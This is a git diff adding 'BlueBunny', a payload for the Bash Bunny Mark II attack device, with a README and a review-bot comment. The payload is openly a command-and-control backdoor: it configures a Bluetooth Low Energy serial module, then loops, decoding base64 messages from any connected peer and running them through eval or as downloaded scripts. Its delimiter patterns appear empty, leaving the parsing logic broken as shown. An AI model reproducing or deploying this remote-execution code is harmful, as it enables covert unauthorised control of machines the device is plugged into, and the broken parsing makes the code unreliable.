diff --git a/payloads/library/remote_access/BlueBunny/README.md b/payloads/library/remote_access/BlueBunny/README.md
new file mode 100644
index 00000000..9df8124c
--- /dev/null
+++ b/payloads/library/remote_access/BlueBunny/README.md
@@ -0,0 +1,20 @@
+# BlueBunny
+* Author: 90N45
+* Version: 1.0
+* Category: Remote
+* Attackmodes: NONE (Custom)
+
+### Description
+Command & Control (C2) solution that communicates directly over Bluetooth-Low-Energy with your Bash Bunny Mark II.
+Send your Bash Bunny all the instructions it needs on-demand over the air.
+
+### Setup
+This payload makes your Bash Bunny usable for the BlueBunny C2 server. For installing the C2 server and controlling your Bash Bunny remotly from it you can follow the instructions form the [BlueBunny GitHub repository](https://github.com/90N45-d3v/BlueBunny)
+
+### Status
+| LED | State |
+| --- | --- |
+| Magenta solid (SETUP) | Configuring BLE |
+| Green 1000ms VERYFAST blink followed by SOLID (FINISH) | Bash Bunny can be connected to BlueBunny C2 |
+
+*Average runtime: 13 seconds*
\ No newline at end of file
diff --git a/payloads/library/remote_access/BlueBunny/payload.txt b/payloads/library/remote_access/BlueBunny/payload.txt
new file mode 100644
index 00000000..e5325aa1
--- /dev/null
+++ b/payloads/library/remote_access/BlueBunny/payload.txt
@@ -0,0 +1,63 @@
+#!/bin/bash
+#
+# Title: BlueBunny
+# Description: BLE based C2 server for the Bash Bunny Mark II
+# Author: 90N45
+# Version: 1.0
+# Category: Remote
+# Attackmodes: NONE (Custom)
+
+LED SETUP
+
+# Enable serial BLE module
+stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
+stty -F /dev/ttyS1 speed 115200 cs8 -cstopb -parenb -echo -ixon -icanon -opost
+sleep 1
+
+# Configure BLE module as slave
+echo -n -e "AT+ROLE=0" > /dev/ttyS1
+echo -n -e "AT+NAME=BlueBunny" > /dev/ttyS1
+echo -n -e "AT+ADV=1" > /dev/ttyS1
+echo -n -e "AT+RESET" > /dev/ttyS1
+
+LED FINISH
+
+while [[ true ]]; do
+ # Get incomming data from serial port
+ data=$(head -1 /dev/ttyS1)
+
+ # Decode base64 encoded data
+ data=$(echo ${data} | base64 -d)
+
+ # Echo data for debugging
+ echo "Debugger: ${data}"
+
+ # Single command
+ if [[ $data =~ "" ]]; then
+ # Extract command
+ command=${data#*}
+ command=${command%%*}
+
+ # Run recieved command
+ eval "${command}"
+ fi
+
+ # Payload file
+ if [[ $data =~ "" ]]; then
+ # Set payload file name
+ file="BlueBunnyPayload-${RANDOM}.txt"
+
+ # Extract file content
+ content=${data#*}
+ content=${content%%*}
+
+ # Write content to file
+ printf "${content}" > "${file}";
+
+ # Run payload
+ bash $file
+
+ # Remove payload file
+ rm $file
+ fi
+done
\ No newline at end of file
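Review bot: `printf "${content}" > "${file}"` in the payload-file branch passes the received text as the printf format string, so any `%` or backslash sequence in it is interpreted rather than written out and the file that gets executed can differ from what was sent; use `printf '%s' "${content}" > "${file}"`. The two `[[ $data =~ "" ]]` tests and the `${data#*}` / `${command%%*}` expansions read as empty patterns in this hunk — if that is the committed text rather than delimiter characters lost in transit, the empty regex matches every line so both branches run on every message, and `${command%%*}` strips the whole string and leaves `command` empty, so the delimiters are worth confirming in the file. `data=$(echo ${data} | base64 -d)` is unquoted and does not check the decode result, so a malformed or truncated line silently yields empty data to the same branches; `data=$(base64 -d <<<"$data") || continue` covers both. Nothing on the serial side checks who the BLE peer is before the decoded text reaches `eval`, which the README's Setup section should state so operators know the device acts on instructions from any connected peer.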